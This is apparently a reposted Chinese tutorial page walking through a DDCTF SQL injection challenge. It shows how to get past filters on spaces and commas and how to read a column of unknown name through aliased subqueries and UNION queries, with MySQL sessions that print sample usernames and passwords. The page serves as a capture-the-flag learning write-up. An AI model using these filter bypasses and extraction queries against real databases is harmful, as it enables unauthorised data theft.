<form id="hz9zz"></form>
    • <form id="hz9zz"></form>
    

      

      <nobr id="hz9zz"></nobr>
      <form id="hz9zz"></form>
      3.   
          
      明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!
                   
        
                           
        
                        		  
        
                 
              
                
      Mysql怎么繞過未知字段名詳細說明
                
                  發表時間:2023-07-22             來源:明輝站整理相關軟件相關文章人氣:          
              
      [摘要]本文主要給大家介紹了Mysql如何巧妙的繞過未知字段名的相關資料,文中給出了詳細的示例代碼供大家參考學習,對學習mysql具有一定的參考學習價值,需要的朋友們下面來一起看看吧,希望能幫助到大家。前言...
      本文主要給大家介紹了Mysql如何巧妙的繞過未知字段名的相關資料,文中給出了詳細的示例代碼供大家參考學習,對學習mysql具有一定的參考學習價值,需要的朋友們下面來一起看看吧,希望能幫助到大家。
      前言
      本文介紹的是DDCTF第五題,繞過未知字段名的技巧,這里拿本機來操作了下,思路很棒也很清晰,分享給大家,下面來看看詳細的介紹:
      實現思路
      題目過濾空格和逗號,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括號都可以繞過,逗號使用join繞過;
      存放flag的字段名未知,information_schema.columns也將表名的hex過濾了,即獲取不到字段名;這時可以利用聯合查詢,過程如下:
      思想就是獲取flag,讓其在已知字段名下出現;
      示例代碼:
      mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
  a   b   c   d  
+---+---+---+---+
  1   2   3   4  
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
  1   2   3   4  
+---+---+---+---+
  1   2   3   4  
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
  1   2    3    4    
+---+-------+----------+-------------+
  1   2    3    4    
  1   admin   admin888   110@110.com  
  2   test   test123   119@119.com  
  3   cs   cs123   120@120.com  
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
  4    
+-------------+
  4    
  110@110.com  
  119@119.com  
  120@120.com  
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
  4    
+-------------+
  120@120.com  
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
  id     username   password   email   
+-------------+----------+----------+-------------+
  1     admin   admin888   110@110.com  
  120@120.com   1    1    1    
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)
      相關推薦:
      MySQL開啟慢查詢日志的方法詳解
      十個Mysql中基本語句優化的原則
      Linux服務器中MySQL遠程連接方法詳解
      以上就是Mysql如何繞過未知字段名詳解的詳細內容,更多請關注php中文網其它相關文章!
      				
				
      學習教程快速掌握從入門到精通的SQL知識。




              
              
                 
              
                                            
                              		       
                          
                           		  
        
                            
      
日韩精品一区二区三区高清